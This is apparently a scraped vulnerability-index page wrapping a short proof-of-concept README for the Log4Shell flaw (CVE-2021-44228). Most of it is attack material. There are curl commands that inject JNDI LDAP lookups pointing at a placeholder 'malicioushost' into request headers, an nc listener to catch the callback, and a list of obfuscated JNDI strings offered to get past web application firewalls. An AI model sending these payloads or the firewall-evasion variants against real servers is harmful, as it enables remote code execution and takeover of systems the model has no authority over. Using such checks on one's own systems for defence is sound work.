来源

关联漏洞

描述

CVE-2021-44228

介绍

# log4j-CVE-2021-44228
On December 5, 2021, Apache identified a vulnerability (later identified as CVE-2021-44228) in their widely used Log4j logging service. The vulnerability, also known as Log4shell, enables attackers to gain full control of affected servers by allowing unauthenticated remote code execution if the user is running an application utilizing the Java logging library. Log4j is heavily integrated into a broad set of devops frameworks, enterprise IT systems, and vendor software and cloud products.


Execute the following in the malicious remote host to check if your server is vulnerable to Log4j exploit

```curl vulnserver:port -H 'X-Api-Version: ${jndi:ldap://malicioushost:mport/a}'```

```nc -lnvp mport```


Other variations which involve a HTTP-POST request can be used to check for vulnerability 

```curl -H 'User-Agent: ${jndi:ldap://malicioushost:mport/a}'  vulnserver:port```


To Bypass webapp firewall 
```
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://asdasd.asdasd.asdasd/poc}
${${::-j}ndi:rmi://asdasd.asdasd.asdasd/ass}
${jndi:rmi://adsasd.asdasd.asdasd}
${${lower:jndi}:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:${lower:jndi}}:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://xxxxxxx.xx/poc}
```

文件快照

 [4.0K]  /data/pocs/24ce0ae82f9e17f8d5be1eafc8b0a953e426f6c5
├── [ 34K]  LICENSE
└── [1.4K]  README.md

0 directories, 2 files

备注